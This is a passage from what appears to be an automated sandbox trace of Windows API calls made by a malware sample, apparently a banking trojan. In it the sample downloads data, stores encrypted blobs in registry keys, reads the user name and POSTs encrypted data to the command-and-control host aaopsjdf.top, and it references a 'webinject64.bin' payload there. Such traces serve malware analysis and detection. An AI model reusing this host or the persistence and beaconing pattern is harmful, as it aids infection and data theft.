lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23aa872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.643] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.644] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23ab872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ab872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.644] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.644] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23ac872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ac872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.645] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.645] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23ad872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ad872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.695] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.695] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23ae872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ae872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.696] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.696] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23af872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23af872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.697] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.697] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b0872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b0872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.699] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.699] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b1872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b1872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.701] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.701] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b2872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b2872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.701] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.701] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b3872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b3872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.702] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.702] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b4872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b4872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.702] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.703] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b5872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b5872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.709] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.710] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b6872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b6872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.710] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.710] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b7872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b7872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.711] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.712] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b8872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b8872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.714] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.714] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b9872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b9872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.715] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.715] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23ba872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ba872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.715] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.715] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bb872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bb872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.715] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.715] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bc872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bc872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.715] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.715] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bd872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bd872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.758] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.758] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23be872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23be872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.758] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.758] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bf872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bf872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0319.759] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.759] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c0872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c0872*, lpdwNumberOfBytesRead=0x28ff448*=0x3ca) returned 1 [0319.759] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0319.759] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c0c3c, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c0c3c*, lpdwNumberOfBytesRead=0x28ff448*=0x0) returned 1 [0319.763] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0319.764] InternetQueryOptionA (in: hInternet=0xcc0010, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0319.764] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0319.764] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0319.770] CryptImportKey (in: hProv=0x3de630, pbData=0x238e350, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x28ff8e4 | out: phKey=0x28ff8e4*=0x45b4d8) returned 1 [0319.774] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28ff8d8 | out: phHash=0x28ff8d8) returned 1 [0319.774] CryptHashData (hHash=0x45b518, pbData=0x3905f40, dwDataLen=0x10210, dwFlags=0x0) returned 1 [0319.774] CryptVerifySignatureW (hHash=0x45b518, pbSignature=0x238e350, dwSigLen=0x100, hPubKey=0x45b4d8, szDescription=0x0, dwFlags=0x0) returned 1 [0319.774] CryptDestroyHash (hHash=0x45b518) returned 1 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="F0") returned 2 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="63") returned 2 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="54") returned 2 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="6A") returned 2 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="58") returned 2 [0319.774] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="53") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="AF") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="55") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="08") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="DB") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="5A") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="15") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="75") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="1D") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="B3") returned 2 [0319.775] wvnsprintfW (in: pszDest=0x28ff680, cchDest=3, pszFmt="%02X", arglist=0x28ff65c | out: pszDest="4A") returned 2 [0319.775] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="F063546A5853AF5508DB5A15751DB34A") returned 0x5b0 [0319.775] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0319.775] PathCombineW (in: pszDest=0x89998, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0319.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28ff596, cbMultiByte=4, lpWideCharStr=0x89a00, cchWideChar=10 | out: lpWideCharStr="Etegci") returned 4 [0319.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff5a0 | out: phkResult=0x28ff5a0*=0x66c) returned 0x0 [0319.775] RegQueryValueExW (in: hKey=0x66c, lpValueName="Eteg", lpReserved=0x0, lpType=0x28ff8d0, lpData=0x0, lpcbData=0x28ff5b4*=0x0 | out: lpType=0x28ff8d0*=0x0, lpData=0x0, lpcbData=0x28ff5b4*=0x0) returned 0x2 [0319.775] RegCloseKey (hKey=0x66c) returned 0x0 [0319.783] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28ff5b0, lpdwDisposition=0x0 | out: phkResult=0x28ff5b0*=0x66c, lpdwDisposition=0x0) returned 0x0 [0319.783] RegSetValueExW (in: hKey=0x66c, lpValueName="Eteg", Reserved=0x0, dwType=0x3, lpData=0x395bff8*, cbData=0x15860 | out: lpData=0x395bff8*) returned 0x0 [0319.785] RegCloseKey (hKey=0x66c) returned 0x0 [0319.785] ReleaseMutex (hMutex=0x5b0) returned 1 [0319.785] CloseHandle (hObject=0x5b0) returned 1 [0319.788] CryptDestroyKey (hKey=0x45b4d8) returned 1 [0319.788] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x5b0 [0319.788] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0319.788] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef08 | out: phkResult=0x28fef08*=0x66c) returned 0x0 [0319.788] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x0, lpcbData=0x28fef1c*=0x0 | out: lpType=0x28fef34*=0x3, lpData=0x0, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0319.788] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x238f968, lpcbData=0x28fef1c*=0x6f0 | out: lpType=0x28fef34*=0x3, lpData=0x238f968*, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0319.788] RegCloseKey (hKey=0x66c) returned 0x0 [0319.789] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28fef1c, lpdwDisposition=0x0 | out: phkResult=0x28fef1c*=0x66c, lpdwDisposition=0x0) returned 0x0 [0319.789] RegSetValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x2350db0*, cbData=0x6f0 | out: lpData=0x2350db0*) returned 0x0 [0319.789] RegCloseKey (hKey=0x66c) returned 0x0 [0319.789] ReleaseMutex (hMutex=0x5b0) returned 1 [0319.789] CloseHandle (hObject=0x5b0) returned 1 [0319.789] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0x5b0) returned 0x0 [0319.789] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0319.789] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0319.789] RegCloseKey (hKey=0x5b0) returned 0x0 [0319.789] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0x5b0) returned 0x0 [0319.789] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0319.790] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0319.790] RegCloseKey (hKey=0x5b0) returned 0x0 [0319.790] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject64.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0319.790] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x32, wMilliseconds=0x282)) [0319.790] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0319.790] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0319.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0319.790] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0x5b0) returned 0x0 [0319.790] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0319.790] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0319.791] RegCloseKey (hKey=0x5b0) returned 0x0 [0319.791] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0319.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0319.791] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0319.791] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4240a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240d0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240d8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b4d8) returned 1 [0319.791] LocalFree (hMem=0x4240a0) returned 0x0 [0319.791] wvnsprintfA (in: pszDest=0x235c4e8, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610610") returned 10 [0319.791] CryptEncrypt (in: hKey=0x45b4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0319.791] CryptEncrypt (in: hKey=0x45b4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397968*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397968*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0319.791] CryptDestroyKey (hKey=0x45b4d8) returned 1 [0319.791] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject64.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0319.792] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA") returned 51 [0319.792] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0319.792] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0319.792] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0319.792] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0319.792] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0319.792] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0319.792] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0319.792] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\nã@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x238ded0, dwOptionalLength=0x2c0) returned 0 [0319.982] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0319.982] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0319.982] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\nã@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x238ded0*, dwOptionalLength=0x2c0 | out: lpOptional=0x238ded0*) returned 1 [0320.585] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0320.585] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f0718, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f0718*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.587] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f1718, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f1718*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.588] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f2718, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f2718*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.589] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.589] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f3718, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f3718*, lpdwNumberOfBytesRead=0x28ff448*=0xf2b) returned 1 [0320.589] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.589] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f4643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f4643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.591] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.591] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f5643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f5643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.591] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f6643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f6643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.592] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f7643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f7643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.593] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f8643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f8643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.651] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.651] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38f9643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38f9643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.652] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.653] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38fa643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38fa643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.653] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.654] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38fb643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38fb643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.655] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.655] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38fc643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38fc643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.658] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.658] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38fd643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38fd643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.658] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.659] InternetReadFile (in: hFile=0xcc000c, 